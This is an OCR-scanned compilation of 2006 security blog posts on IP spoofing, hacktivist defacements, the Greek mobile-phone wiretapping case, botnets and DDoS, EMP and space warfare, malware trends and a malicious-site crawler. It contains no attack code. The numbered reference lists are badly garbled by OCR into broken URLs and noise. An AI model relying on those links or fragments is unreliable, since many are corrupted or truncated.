[23]DNSA - DNS auditing tool 


[24]Despoof - anti packet spoofing 


As well as read more info on IP Spoofing, Distributed concepts and related tools : 


[25]IP Spoofing - An Introduction 
[26]Distributed Tracing of Intruders 
[27]Distributed Phishing Attacks 
[28]MAC Distributed Security 
[29]IPv6 Distributed Security(draft) 
[30]Distributed Firewalls 

[31]Web Spoofing 


[32]The threats of distributed cracking 


220 


Technorati tags: 


[33]security, [34]information security, [35]spoofing, [36]IPSec, [37]IPv6, [38]distributed 


. http://spoofer.csail.mit.edu/ 


ttp://en.wikipedia. org/wiki/IP_spoofing 


t hev.blogsp net .htm 


ttp://grc.com/dos/drdos.ht 


. http: //dd t.com/2006/01/how-to-secure- inter 
Fics /ore ceacteee coa/aeaxesen ine aeons] 
_hetp://wstechvorld.con/ security /neus/index. cfu? ews ID=6i73 
9 ST eT ETE 

. http: //ww om/windowsxp/sp2/default .mspx 

. http://sp t.edu/#software 


py 
oO 


11, fetp://en. wikipedia. org/¥iki/05I¥i 


anc / 
-wikipedia 
oofer.csai / 
14. http://www.washingtonpost.com/wp-srv/photo/postphotos/orb/asection/2006-01-27/4.htm 


fe) 
a! re) 
t al ie 
t er ail.mi 


ttp://cryptome.org/wiz/nsa-wizard. htm 
ttp://www.eff.org/Privacy/Crypto/Crypto_misc/DESCracker/ 


ttp://www.ktulu.com.ar/en/djohn.php 


ttp://packetstorm. linuxexposed.com/filedesc/bob-the-butcher-0.5.7.tar.htm 


19. http://setiathome.ssl.berkeley.edu/ 
. http://isis.poly.edu/kulesh/research/pubs/mmm-acns- 2003. pdf 
21. http://pandoramon.sourceforge.net/ 


22 
23 


ttp://www.geschke-online.de/FLoP/ 
ttp://www.packetfactory.net/projects/dnsa/ 


ttp://www.bindview.com/Services/RAZOR/Utilities/Unix_Linux/despoof_readme.cfm 
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25. http://www.securityfocus.com/infocus/1674 
26. http://www.cs.ucdavis.edu/research/tech-reports/1995/CSE-95-2. pdf 


27. http://www.cs.columbia. edu/wrfis/serendipity/uploads/phishing-5.pdf 
28. ttp://grouper . ieee. org/groups/802/15/pub/2002/May02/02221r1P802-15_TG4-MAC-Distributed-Security-Propos 
29. 

30, 

21 


. bttp://www.swiss.ai.mit.edu/6.805/student-papers/fal197-papers/twyman- cracking .htm 


33, 

34, 
_netp:/ technorati. con/tag/ spoofing 

36. 
_hetp://eechnorats. con/tag/ TPG 


http: //technorati.com/tag/distributed 


2.2.5 Hacktivism tensions (2006-02-07 10:08) 


It was about time the freedom of the press and the 

democratic nature of joking with politicians takes its hit. But why with 

Spiritual leaders? The contradictive [1]Muhammad cartoons sparkled a lot of [2]anger, and 
with the recent [3]tentions in France all we needed was a [4]hacktivism activity from angry 
muslims. Remember how the [5]China vs U.S cyberwar was [6]sparkled [7]due to the death of 
a Chinese pilot crashing into an [8]AWACS that was sort of "keeping it quiet"? 


Zone-H is reporting on [9]massive defacements of Danish sites, and if you take the time to go 
through the reported reasons you'll find out that : 
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N 


"political reasons" 


"iust for fun" 


"I just want to be the best defacer" 


"revenge against that web site" 


"patriotism" 
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tend to dominate. As far as defacements as concerned, in one of my previous posts "[10]FBI’s 
2005 Computer Crime Survey - what’s to consider?" you can see that according to the report, 
organizations lost approximately $10,395M due to web site defacements. Moreover, in some of 
my previous research on [11]Cyberterrorism I’ve indicated the use of script kiddies for [12]PSY- 
OPS and how such defacements have a favorable psychologic effect on future initiatives. 
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And while they have the motivation to deface, | wonder would someone strike back and under 


what justification? 


Technorati tags: 


[13]security, [14]information security, [15]defacement, [16]Zone-H, [17]hacktivism, [18]cy- 


berterrorism, [19]Muhammad cartoons, [20]hacking, [21]Denmark 


reps] /exyprene.org/manannad ea 
| http://news bbc co uk/1/hi /wor1d/europe/ 4670370. stl 
_hetp://eryptone org/tr-rict/#r-riot-04. hen 

| fttp://en. wikipedia. ong/viki/tecktivied 


ttp://news.bbc.co.uk/hi/english/world/asia-pacific/newsid_1322000/1322839.st 


. http://www.vitalsecurity.org/2006/01/first-hacker-world-war .htm 


ttp://www.astalavista.com/index.php?section=directory&linkid=611 


ttp://en.wikipedia.org/wiki/Airborne_warning_and_control_system 
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9. http://www. zone-h. org/en/news/read/id=205987/ 

10. http: //ddanchev.blogspot .com/2006/01/fbis-2005-computer-crime-survey-whats.htm 
1 
12. 

13, 

14. 

15. 

16. 

17 

18. 

18. 

20. 

21. 


2.2.6 Security Awareness Posters (2006-02-07 13:35) 


Security is all about awareness at the bottom line. 
The better you understand it, the higher your chance of "survival", and 
hopefully progress! 


Enjoy the following collections of witty and amusing security awareness posters : 


[1]1, [2]2, [3]3 (you may also be interested in going through my talk on security policies and 
awareness with [4]K Rudolph from Native Intelligence as well), [5]4, [6]5, [7]6, [8]7, [9]8. 
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[°>) 


Technorati tags: 


[10]security, [L1]information security, [12]security training, [13]security education 


| 
| 
| 
ttp://www.iupui.edu/~dmstest/Nat1l_Cybersecurity_Posters/FINAL_POSTERS/Full_Size_JPEGs/ 
| 
| 
| 
10. 
11. 
12. 
13. 


2.2.7 A top level espionage case in Greece (2006-02-08 15:14) 


Starting shortly after the Olympic games in 2004 

and up to March 2005, the mobile phones of : Prime Minister Costas 

Caramanlis, minister of foreign affairs, defense, public order and 

justice, top military officials, a number of journalists, and human 

rights activists (hmm?) [1]have been tapped [2]by an unknown party though the installation 
of "[3]spy software" (that’s too open topic) , mind you, Vodafone’s central system, and were 
diverted to a pay-as-you-go mobile phone. 


At 

the bottom line, who’s behind it? Interested parties within the Greek 

government, or external ones? To me this is the job of a [4]dead [5]insider’s 

job or someone who had the incentive to Vodafone's security, which | 

doubt. Though, it is disturbing how easily these mobile numbers could be 

obtained as the majority of media representitives already have them! My 

point is that you should count them as the weakest link, besides 

accessing a [6]mobile provider’s database and other sources. UPDATE : [7]Vodafone’s state- 
ment UPDATE 2 : [8]Cryptome featured more info on the [9]The Greek illegal wiretapping 
scandal: some translations and resources. 
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Another recent spy case was the [10]rock transmitter found in a Moscow park and while the 
[11]Russian president Putin is cheering the discovery and keeping it diplomatic, the [12]FSB 
(a [13]successor to the KGB) is taking a note on this one. You can actually go through a 
[14]collection of videos and references on the case. 


| guess it’s the silence that’s most disturbing in the "Silent War". 


Technorati tags : 


[15]security, [1L6]Jinformation security, [17]espionage, [18]Intelligence, [19]Greece, 
[20]Insider 


1 icep/ owen on/2006/WORLD ourope/02/06/greace tapping weut/ 
2. bhttps://web.archive.org/web/20061026092427/http://www.ekathimerini.com/4dcgi/_w_articles_politics_100004_0 
| ee ee 
_hvtp://aw.mpa.gr/article.ntml?éoc,£4-665920 


ttp://ddanchev. blogspot .com/2005/12/insiders-insights-trends-and-possible.htm 


3 
4 
5. 
6. tips /rew. epic. ong/privacy/iei/attaciment_o. pq 
7 
8 
9 


. http: //www.vodafone.gr/live1/extp. jsp?type=prrel&prid=10467&lang=1klangSTR=e 


_http://uones.esat uleuvenbe/~qianezis/intercept. kta 
10. 

12, 

13, 
15, 


16. 


18, 
19, 


2.2.8 The War against botnets and DDoS attacks (2006-02-09 15:44) 


In one of my previous posts talking about [1]botnet herders | pointed out how experiments 
tend to dominate, and while [2]botnets 

protection is still a buzz word, major security vendors are actively 

working on product line extensions. DDoS attacks are the result of 

successful botnet, and so are the root of the problem besides the [3]distributed concept. 
Techworld is reporting that [4]McAfee is launching a "bot-killing system", from the article : 


"Unlike 

conventional DDoS detection systems based on the statistical analysis 
of traffic, the first layer of the new Advanced Botnet Protection (ABP) 
intrusion prevention system (IPS) uses a proxy to pass or block packet 


a” il 


traffic dependent on whether or not it is “complete”. 
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The 

best thing is that it’s free, the bad thing is that it may give their 

customers a "false sense of security", that is, while the company is 

actively working on retaining its current customers, | feel "SYN 

cookies" and their concept has been around for years. Moreover, using a 

service provided by a company whose core competencies have nothing to do 

with DDoS defense can be tricky. Companies worth mentioning are [5]Arbor Networks, and 
[6]Cisco’s solutions, besides the many other alternative and flexible ways of dealing with 
DDoS attacks. 


In my research research on the [7]Future trends of Malware, | pointed out some of the 
trends related to botnets and DDoS attacks, namely, DDoS extortion, DDoS on demand/hire, 
and with the first legally prosecuted case of [8]offering botnet access on demand, it’s a 
[9]clear indication 

that of where things are going. Defense against frontal attacks isn’t 

cost-effective given that at the bottom line the costs to maintain the 

site outpace the revenues generated for the time, hard dollars 

disappear, soft ones as reputation remain the same. 
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[10]My 

advice is to take into consideration the possibility to outsource your 
problem, and stay away from product line extensions, and | think it’s 
that very simple. A differentiated service on fighting infected nodes is 
being offered by Sophos, namely the [11]Zombie Alert, 

which makes me wonder why the majority of AV vendors besides them 
haven’t come up with an alternative given the data their sensor networks 
are able to collect? Moreover, should such as service be free, would it 
end up as a licensed extensions to be included within the majority of 
security solutions, and can a motivated system administrators 
successfully detect, block, and isolate zombie traffic going out of the 
network(I think yes!)? 


As far as botnets are concerned, there were even 

speculations on using "[12]Skype to control botnets", 

now who would want to do that, and under what reason given the current 
approaches for controlling botnets, isn’t the use of cryptography or 
security through obscurity("talkative bots", stripping IRCds) the 

logical "evolution" in here? 


Something else worth mentioning is the trend of how [13]DoS 
attacks got totally replaced by DDoS ones, my point is that the first 


can be a much more sneaky one and easily go beneath the radar, compared 


to a large scale DDoS attack. A single packet can be worth more than an 
entire botnets population, isn’t it? 
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How do you 
think DDoS attacks should be prevented, active defense such as the 
solutions mentioned, or proactive solutions? What do you think? 


You can also go though other resources dealing with DDoS attacks and possible solutions to 
the problem : 


[14]Dave Dittrich’s DDoS attacks and protection page 


[15]Recommendations for the Protection against Distributed Denial-of-Service Attacks in the 
Internet 


[16]Botz-4-Sale: Surviving Organized DDoS Attacks That Mimic Flash Crowds 


[17]Defense Against DoS/DDoS Attacks 


[18]DDoS: Undeniably a global Internet problem looking for a global solution 


232 


[19]Scalable Protecting Against DDoS and Worm Attacks 


[20]An Analysis of Using Reflectors An Analysis of Using Reflectors 


[21]Attacking DDoS at the Source 


[22]A Taxonomy of DDoS Attacks and DDoS Defense Mechanisms 


[23]A Survey of DDoS Defense Mechanisms 


[24]A summary of DoS/DDoS prevention, Monitoring and Mitigation Techniques in a Service 
Provider Environment 


[25]Experience in fighting DDoS attacks 


[26]Distributed Defense Against DDoS Attacks 


[27]On the Effectiveness of DDoS Attacks on Statistical Filtering 


[28]The Spamhaus Don’t Route or Peer List (DROP) 
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[29]The Prolexic Zombie Report 


Technorati tags : 


[30]security, [31]information security, [32]malware, [33]botnets, [34]DDoS, [35]McAfee, 
[36]Sophos, [37]AntiVirus 
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. http: //en.wikipedia.org/wiki/Botnet 
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. http://www. arbor .net/ 


. http://www.cisco.com/en/US/netsol/ns615/networking_solutions_sub_solution.htm 


; 
. http: //news .findlaw.com/hdocs/docs/cyberlaw/usanchetaind. pdf 
10. 
1 
12. 
. http: //en.wikipedia. org/wiki/Denial-of-service_attack 
14, 
15. 
16. 
17. 
18. 


19. 
20. https://web.archive.org/web/20061026092427 /http://downloads.securityfocus.com/library/reflectors.CCR.01. 
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26. https://web.archive.org/web/20061026092427/http://www.cis.udel.edu/~sunshine/publications/udel_tech_repo 
27. https: //web.archive.org/web/20061026092427/http: //www.comp.nus.edu.sg/~liqm/publications/DDoS. pdf 

28. noxps://ved. archive. org/eb/20061026052427 netp: //vwy. epamhsus.org/DROP/ 

29, https: //aeb. archive. org/seb/20061026002421 atxp://awy.prolexic.con/2r/ 

30. beeper //web_archive-org/ eb 2006102600247! /attp://eechnorats_con/tug/oecari@] 

34, hotps://veb.archive.org/eb/20061026092427 Mevp://vecknorats.con/+ag/D005 

35, https: //aeb. archive. org/seb/20061026002421 trp: //eechnorat.con/tag/MeAted 

36. butper//veb- archive. org/web/20061020007401 vip: //vecinorats.con/vag/Sophod 


2.2.9 Who needs nuclear weapons anymore? (2006-02-09 16:29) 


Excluding [1]lran and the potential of its nuclear program (no country [2]that bans music 
should have such a power!), perhaps | should rephrase - who can 

actually use them nowadays, are they just a statement of power, does 

flexibility and beneath the radar concepts matter? | feel they do. 


| just came across a news article from January on a new [3]EMP warhead test, and while there 
have been speculations/or movie plots that [4]Electromagnetic Pulse Weapons could be used 
by [5]terrorists, 

| find this a bit of exaggerated statement that actually seeks further 

investment in current development of the concept | guess. | feel that 

compared to symmetric warfare, [6]Jasymmetric warfare 

as a concept has greatly evolved during the years, and in today’s 

interconnected society, military powers could be easily balanced. What’s else to mention is 
the "cooperation" between the parties on which | came across in a [7]report on Nuclear 
Electromagnetic Pulse, as of June 9, 2005, namely : 
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"lf 

we really wanted to hurt you with no fear of retaliation, we would 

launch an SLBM,” which if it was launched in a submarine at sea, we 

really would not know for certain where it came from. “We would launch 

an SLBM, we would detonate a nuclear weapon high above your country, and 
we would shut down your power grid and your communications for 6 months 
or so.” The third-ranking communist was there in the country. His name 

is Alexander Shurbanov, and he smiled and said, “And if one weapon 

would not do it, we have some spares.” | think the number of those 

spares now is something like 6,000 weapons." 


"the 
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Russians had developed weapons that produced 200 kilovolts per meter. 
Remember, the effects in Hawaii were judged to be the result of five 
kilovolts per meter. So this is a force about 200 times higher. The 
Russian generals said that they believed that to be several times higher 
than the hardening that we had provided for our military platforms that 
they could resist EMP." 


“Chinese 
military writings described EMP as the key to victory and described 
scenarios where EMP is used against U.S. aircraft carriers in the 
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conflict over Taiwan.” So it is not like our potential enemies do not 
know that this exists. The Soviets had very wide experience with this, 
and there is a lot of information in the public domain relative to this. 
“A survey of worldwide military and scientific literature sponsored by 
the commission,” that is the commission that wrote this report, 
“found widespread knowledge about EMP and its potential military 
utility including in Taiwan, Israel, Egypt, India, Pakistan, Iran, and 
North Korea." 


Still there’s hope for preserving the global state of security instead of fuelling its insecurity : 
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"In 

2004, the EMP Commission met with very senior Russian officers, and we 
showed that on the sign. They warned that the knowledge and technology 
to develop what they called super EMP weapons had been transferred to 
North Korea and that North Korea could probably develop these weapons in 
the near future, within a few years. The Russian officers said that the 
threat that would be posed to global security by a North Korean armed 
with super EMP weapons was, in their view, and ! am sure, Mr. Speaker, 

in your view and mine, unacceptable." 


[8]Foreign views of Electromagnetic Pulse (EMP) Attack reveals further details on other 
nations’ ambitions etc. Perhaps one of the most famous commitments towards EMP is the 
[9]The Trestle Electromagnetic Pulse Simulator that can also be seen at [10]Google Maps, still, 
in my opinion it’s a defensive initiative for an offensive purpose :( 
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[Lilet 


Extending the topic even further, [12]The Space Warfare 

arms race has been an active policy of key world’s leaders for decades, 
and that’s not good. The U.S, Russia and China as the main players are 
fuelling the growth in one way or other due to believing in perhaps : 


- that the other sides are actively developing such capabilities, and they are, because they 
think the opposite => arms race 


- growing trend towards [13]asymmetric warfare 


- cost-effectiveness compared to building a multimillion nuclear submarine as a statement of 
power? 


In my opinion space warfare would directly influence everyone down here on Earth, and 
scenarios such as : 


- [14]satellites [15]jamming 
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- [16]space SIGING 


- hijacking? 


- destroying 


could become normal. [17]Space is already getting crowded, if | were to forget one of my 
favourite quotes "[18]But | guess I'd Say if it is just us... seems like an awful waste of space". 
On the other, and in respect to securing critical infrastructure on Earth :) | find recent 
initiatives such as the [19]Cyber Storm exercise more PR, than relevance oriented, my point 
is that how come you expect to have the [20]critical infrastructure secured, when a 
[21]global overload in traffic would again deny service, 

a critical one. 


My point is that, the Internet as the most pervasive 

and cost effective tool is often utilized for sensitive both, 

commercial, government and military operations, attacking the Internet 

affects pretty much everyone. Excluding the overall shift towards [22]network-centric 
warfare and you’ve got a problem given commercial and public IP networks are used to 
handle the [23]enormous bandwidth needed for sensitive operations. 
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To sum up, go through the following [24]War Quotes, and perhaps consider how major 
problems on Earth stop major innovations in [25]Space. 

| feel War is not a solution, but an excuse that should never be said! | 

know this post tried to combine several different issues, but | think 

given IP is at the bottom line, my readers wouldn’t mind :) What’s your 

attitude on Space Warfare arms race? Is it real, and how do you picture 

the future developments in here? 


More resources on Electromagnetic Pulse Weapons, Space Warfare and Network-Centric 
Warfare are also available at : 


[26]High Altitude Electromagnetic Pulse (HEMP) and High Power Microwave (HPM) Devices: 


Threat Assessments 


[27]The Effects Nuclear Weapons 
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[28]ELECTROMAGNETIC PULSE - (House of Representatives - June 21, 2005) 


[29]Preliminary Findings of the Commission to Assess the Threat from EMP 


[30]Communications Electronic Warfare and the Digitised Battlefield 


[31]The Implementation of Network-Centric Warfare 


[32]Complexity Theory and Network Centric Warfare 


[33]On Space Warfare 


[34]Warfare in Space 


[35]Space Systems Survivability 


[36]Developments in Military Space: Movement toward space weapons? 
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[37]Weapons in Space: Silver Bullet or Russian Roulette? 


[38]From Cold War to Asymmetric Warfare 


[39]Four Myths about Space Power 


[40]China as a Military Space Competitor 


. http: //news.bbc.co.uk/2/hi/middle_east/4543720.stm 
. http://www. strategypage.com/htmw/htairw/articles/20060111.aspx 


. http://en.wikipedia.org/wiki/Asymmetric_warfare 


. http://www. endtimesreport.com/EMP_attack.htm 


1 
2 
3 
4 
5. http: //ddanchev. blogspot . com/2006/01/cyberterrorism-recent-developments . html 
6 
7 
8 
9. http://www. brook. edu/FP/projects/nucwcost/trestle. htm 
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. http://maps. google. com/maps?q=Albuquerque , +NM&11=35 .029811, -106.557770&spn=0. 005246 , 0. 007693&t=k&hl=e 


12. 
13, 


. https://web. archive. org/web/20061026092427/http: //www.gyre.org/news/related/Satellites/Satellitet+Jamming 


ray 
ray 


. http: //users.ox.ac.uk/~daveh/Space/Military/milspace_sigint.htm 


16. 

17. http: //eyeball-series.org/satspy/satspy-eyeball.ht 

18. 

19. http://www.washingtontechnology.com/news/1_1/daily_news/27877-1.htm 

20. 

21. 

22. 

23. http://www.californiaspaceauthority.org/images/pdfs/040831-milsatcom-anderson. pdf 
24, 

25. 

26. 

27. http://www. princeton. edu/~globsec/publications/effects/effects11.pdf 

28. http://www.bartlett.house.gov/SupportingFiles/documents/EMP_Speech_June_21_2005. pdf 
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29, 
30. 

31. http://www.oft.osd.mil/library/library_files/document_387_NCW_Book_LowRes. pdf 
32. 

33, 

34, 

35. http://space.au.af.mil/primer/space_systems_survivability. pdf 

36. 

37. 

28 

39. 

40. 


2.2.10 Recent Malware developments (2006-02-13 16:43) 


In some of my February’s streams :) "[1]The War against botnets and DDoS attacks" and 
"[2]CME - 24 aka Nyxem, and who’s infected?" | covered some of the recent events related to 
[3]malware trends 

in the first months of 2006. This is perhaps the perfect time to say a 

big thanks to everyone who’s been expressing ideas, remarks and thoughts 

on my malware research. While conducting the reseach itself | realized 

that | simply cannot include everything | want it, as | didn’t wanted to 

release a book to have its content outdated in less than an year, but a 

"stick to the big picture" representation of the things to come. The 

best part is that while keeping daily track of the trends and trying to 

compile a summary to be released at the end of the year, many more 

concepts that | didn’t include come to my mind, so | feel I'll have 

enough material for a quality summary and justification of my 

statements. So what are some of the recent developments to keep in mind? 


A lot of buzz on the [4JCME-24 front, [5]and | [6]feel 

quite a lot of time was spent on speculating on the infected population 
out of a web counter whose results weren’t that very accurate as 
originally though. And as vendors closely cooperated to build awareness 
on the destructive payload, | think that’s the first victory for 2006, 

no windows of opportunity The best is that CAIDA patiently waited until 
the buzz is over to actually come up with [7]reliable statistics on Nyxem. 


[8] * It’s 

rather quiet on the AV radars’ from the way | see it, and quickly going 

through F-Secure’s, Kaspersky’s (seem to be busy analyzing code, great 

real-time stats!), Symantec’s | came across the similarities you can 

feel for yourself in "the wild" :) [9]Symantec’s ThreatCon is normal, what’s interesting to note 
is [10]VirusTotal’s flood of detected WMF’s, which is perhaps a consequence of the *known* 
[11]second vulnerability. 
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James Ancheta’s case was perhaps the first known and so nicely documented on [12]botnet 


power on [13] * [14]demand. Recently, a botnet, or the participation in such [15]shut down 
a hospital’s network, more over | think StormPay didn’t comply with a [16]DDoS extortion 
attempt during the weekend? 


[17]Joanna Rutkowska provided more insights on stealth malware in her research ([18]slides, 
[19]demo) about "about 

new generation of stealth malware, so called Stealth by Design (SbD) 

malware, which doesn’t use any of the classic rootkit technology tricks, 

but still offers full stealth. The presentation also focuses on 

limitations of the current anti-rootkit technology and why it’s not 

useful in fighting SoD malware. Consequently, alternative method for 


compromise [20] * detection 

is advocated in this presentation, Explicit Compromise Detection (ECD), 
as well as the challenges which Independent Software Vendors encounter 
when trying to implement ECD for Windows systems - | call it Memory 
Reading Problem (MRP). " 


How sound is the possibility of [21]malware heading towards the BIOS anyway? An "[22]Intel- 
ligent P2P worm’s activity” 

that | just across to also deserves to be mentioned, the concept is 

great, still the authors have to figure out how to come up with 

legitimate file sizes for multimedia files if they really want to fake 

its existence, what do you think on this? 


Some recent research and articles worth mentioning are, [23]Kaspersky’s Malware - Evo- 
lution : October - December 2005 outlines the possibilities for [24]cryptoviral extortion 
attacks, Odays vulnerabilities, and [25]how the WMF bug got purchased/sold for $4000. 
There’s also been quite a lot of [26]new trojans analyzed by third-party researchers, and 
among the many recent articles that made me an impression are "[27]Malicious Malware: 
attacking the attackers, part 1" and [28]part 2, from the article : 


"This 

article explores measures to attack those malicious attackers who seek 
to harm our legitimate systems. The proactive use of exploits and bot 
networks that fight other bot networks, along with social engineering 
and attacker techniques are all discussed in an ethical manner." 
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[29]Internet worms and |Pv6 [30]has nice points, still | wish there were only network 
based worms to bother about. Besides all I’ve [31]missed [32]important [33]concepts [34]in 
various commentaries, did you? Malware is still vulnerabilities/social 

engineering attacks split at least for the last several months, still 

the [35]Jincreased corporate and home IM usage will inevitable lead to many more security 
threats to worry about. Web platform worms such as [36]MySpace and [37]Google’s AdSense 
Trojan, are [38]slowly gaining grounds as a Web 2.0 concept, so virus or IDS [39]signatures 
are to look for, try both! 


During January, David Aitel [40]reopened the subject of beneficial worms out of [41]Ves- 
selin Bontchev’s research on "[42]good worms". While | have my [43]reservations 

on such a concept that would have to do with patching mostly the way | 

see it, could exploiting a vulnerability in a piece of malware by 

considered useful some day, or could a network mapping worm launched in 

the wild act as an early response system on mapped targets that could 

end up in a malware’s "hitlist"? And | also think the alternative to 

such an approach going beyond the network level is Johnny Long’s ([44]recent chat with him) 
[45]Google Dorks Hacking Database, 

you won’t need to try to map the unlimited IPv6 address space looking 

for preys. Someone will either do the job for you, or with the time, [46]transparancy in 
[47]IPv6, one necessary for [48]segmented and targeted attacks will be [49]achieved as well. 


Several days ago, Kaspersky released their [50]summary for 2005, nothing ground breaking 
in here compared to previous research on [51]how the WMF vulnerability was purchased/sold 
for $4000 

:) but still, it’s a very comprehensive and in-depth summary of 2005 in 

respect to the variables of a malware they keep track of. | recommend 

you to go through it. What made me an impression? 


- on average, 6368 malicious programs detected by month 


- +272 % Trojan-Downloaders 2005 vs 2004 
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- +212 % Trojan-Dropper 2005 vs 2004 


- +413 % Rootkit 2005 vs 2004 


- During 2005, on average 28 new rootkits a month 


- [52]IM worms 32 modifications per month 


- [53]IRC worms are on -31 % 


- P2P worms are on -43 %, 

the best thing is that Kaspersky labs also shares my opinion on the 

reason for the decline, P2P busts and general prosecutions for 

file-sharing. What’s also interesting is to mention is the recent ruling 

in a district court in Paris on the "[54]legality of P2P" in France and the charge of 5 EUR per 
month for access to P2P, but for how long? :) P2P [55]filesharing isn’t illegal 

and if you cannot come up with a way to release your multimedia content 

online, don’t bother doing at all. In previous chats | had with [56]Eric Goldman, he also makes 
some [57]very good points on the topic. 


- +68 % Exploit, that is [58]software vulnerabilities 

and the use of exploits both known or Oday’s with the idea to easily 
exploit targeted PC, though I’m expecting the actual percentage to be 
much higher 


- Internet banking malware reached a record 402 % growth 

rate by the end of 2005 The Trojan.Passwd is a very good example, it 

clearly indicates that it is written for financial gains. E-banking can 

indeed prove dangerous sometimes, and while I’m not being a paranoid in 

here, I’d would recommend you go through Candid’s well written "[59]Threats to Consider 
when doing E-banking" paper 


- A modest growth from 22 programs per month in 2004 to 31 in 2005 on the [60]Linux 
malware front 
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| 

feel today’s malware scene is so vibrant that it’s getting more and 

more complex to keep track of possible propagation vectors, ecosystem 

here and there, and mostly [61]communicating what’s going on to the general public(actually 
this one isn’t). 


What’s to come and what drives the current growth of malware? 
- money! 


- the [62]commercialization of the market for software vulnerabilities, where we have [63]the 
first underground purchase of the WMF exploit, 

so have software vulnerabilities always been the currency of trade in 

the security world or they’ve started getting the necessary attention 

recently? 


- is stealth malware more than an issue compared to 
utilizing Oday vulnerabilities, and is retaining current zombie PCs a 
bigger priority than to infecting new ones? 


- business competitors, 

enemies, unethical individuals are actively seeking for undetected 

pieces of malware coded especially for their needs, these definitely go [64]beneath the 
sensors 


- [65]Ancheta’s case 
is a clear indication of a working Ecosystem from my point of view, 
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that goes as high as to provide after-sale services such as DDoS 
strength consultations and Oday malware on demand 


[66] * To sum up, [67]malware tends to look so sneaky when spreading and zoomed out :) | 
originally came across the [68]VisualComplexity project in one of my previous posts on 
[69]visualization. Feel I’ve missed something that’s worth mentioning during the last two 
months? Than consider expanding the discussion! 


You can also consider going through the following resources related to malware : 


[70]Semantics-Aware Malware Detection 


[71]Enabling Worm and Malware Investigation Using Virtualization 


[72]Botnet Detection and Response - The Network is the Infection 


[73]Fileprint analysis for Malware Detection 
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[74]Back to the Future: A Framework for Automatic Malware Removal and System Repair 
[75]Assessing your Malware Exposure with Snort 

[76]Truman - The Reusable Unknown Malware Analysis Net 

[77]The Malcode Analyst Pack 

[78]Nepenthes - malware collecting and visualizing tool 

[79]Browser Appliance Virtual Machine 


[80]Mwcollect - a distributed malware collector network 


Technorati tags: 


[81]security, [82]information security, [83]malware, [84]Jantivirus, [85]botnets, [86]kaspersky 
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2.2.11 Look who’s gonna cash for evaluating the maliciousness of the Web? 
(2006-02-14 17:12) 


Two days ago, SecurityFocus ran an article "[1]Startup tries to spin a safer Web" introducing 
[2]SiteAdvisor : 


"A 

group of graduates from the Massachusetts Institute of Technology (MIT) 
aim to change that by crawling the Web with hundreds, and soon 
thousands, of virtual computers that detect which Web sites attempt to 
download software to a visitor’s computer and whether giving out an 
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e-mail address during registration can lead to an avalanche of spam. 


The 

goal is to create a service that lets the average Internet user know 

what a Web site actually does with any information collected or what a 

download will do to a computer, Tom Pinckney, vice president of 

engineering and co-founder of the [3]start-up SiteAdvisor, said during a presentation at the 
[4]CodeCon conferencehere." 


The 

concept is simply amazing, and while it’s been around for ages, it 

stills needs more acceptance from decision makers that tend to 
stereotype on perimeter and antivirus defense only. Let’s start from the 
basics, it is my opinion that users do more surfing than downloading, 
that is, the Web and its insecurities represent a greater threat than 
users receiving malware in their mailboxes or IMs. And not that they 
don’t receive any, but | see a major shift towards URL droppers, and 
while defacement groups are more than willing to [5]share these 

with phishers etc., a URL dropper is easily getting replaced by an IP 

one, so you end up having infected PCs infecting others through hosting 
and distributing the malware, so [6]sneaky, 

isn’t it? My point is that initiatives such as crawling the web for 
malicious sites, listing, categorizing and updating their status is a 

great, both security, and business sound opportunity. The way you know 
the bad neighbourhoods around your town, in that very same way you need a 
visualization to assist in research, or act as a security measure, and 
while its hard to map the Web and keep it up to date, | find the idea 
great! 


So what is [7]SiteAdvisor up to? Another build-to-flip startup? | doubt so as | can almost feel 
the smell of quality entrepreneurship from [8]MIT’s 

graduates, of course, given they assign a CEO with business background 
:) APIs, plugins, already tested the majority of popular sites according 

to them, and it’s for free, at least to the average Internet user who’s 
virtual "word of mouth" will help this project get the scale and 

popularity necessary to see it licensed and included within current 
security solutions. They simply cannot test the entire Web, and | feel 
the shouldn’t even set it as an objective, instead map the most 
trafficked web sites or do so on-the-fly with the top 20 results from 
Google. | wonder how are downloads tested, are they run through 
VirusTotal for instance, and how significant could a "push" approach 
from the end users, thus submitting direct links to malicious files 
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found within to domain for automatic analysis, sound in here? 


| think the usefulness of their idea could only be achieved with the cooperation/acquisition of 
a [9]leading search engine, 

my point is that some of the project’s downsizes are the lack of 

on-the-fly ability(that would be like v2.0 and a major breakthrough in 

respect to performance), how it’s lacking the resources to catch up with 

Google on the known web (25,270,000,000 according to them recently), 

how IP droppers instead of URL based ones totally ruin the idea in 

real-life situations(it takes more efforts to register and maintain a 

domain, compared to using a zombie host’s capabilities to do the same, 

doesn’t it?) 


In one of my previous posts on [10]why you should aim higher than antivirus signatures 
protection only | mentioned some of my ideas on "Is client side sandboxing an [11]alternative 
as well, could and would a customer agree to act as a sandbox compared 

to the current(if any!) contribution of forwarding a suspicious sample? 

Would v2.0 constitute of a [12]collective automated web petrolin a PC’s "spare time"? 


Crawling 

for malicious content and making sense of the approaches used in order 

to provide an effective solutions is very exciting topic. As a matter of 

fact in one of my previous posts "[13]What search engines know, or may find about us?" | 
mentioned about the existence of a project to [14]mine the Web for terrorist sites dating back 
to 2001. And I’m curious on its progress in respect to the [15]current [16]threat of 
Cyberterrorism, 

| feel both, crawling for malicious content and terrorist propaganda 

have a lot in common. Find the bad neighbourhoods, and have your spiders 

do whatever you instruct them to do, but | still feel quality and 

in-depth overview would inevitably be sacrificed for automation. 


What 

do you think is its potential of web crawling for malicious content, 

and by malicious | also include harmful in respect to Cyberterrorism [17]PSYOPS (I once came 
across a [18]comic PSYOPS worth reading!) techniques that | come across on a daily basis? 
Feel [19]free to test any site you want, or browse through their [20]catalogue as well. 


You 
can also find more info on the topic, and alternative crawling 
solutions, projects and Cyberterrorism activities online here : 
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[21]A Crawler-based Study of Spyware on the Web 
[22]Covert Crawling: A Wolf Among Lambs 
[23]IP cloaking and competitive intelligence/disinformation 


[24]Automated Web Patrol with HoneyMonkeys Finding Web Sites That Exploit Browser 
Vulnerabilities 


[25]The Strider HoneyMonkey Project 


[26]STRIDER : A Black-box, State-based Approach to Change and Configuration Management 
and Support 


[27]Webroot’s Phileas Malware Crawler 


[28]Methoden und Verfahren zur Optimierung der Analyse von Netzstrukturen am Beispiel 
des AGN-Malware Crawlers (in German) 


[29]Jinad Online : Islamic Terrorists and the Internet 

[30]Right-wing Extremism on the Internet 

[31]Terrorist web sites courtesy of the [32]SITE Institute 

[33]The HATE [34]Directory November 2005 update (very rich content!) 


[35]Recruitment by Extremist Groups on the Internet 


Technorati tags: 


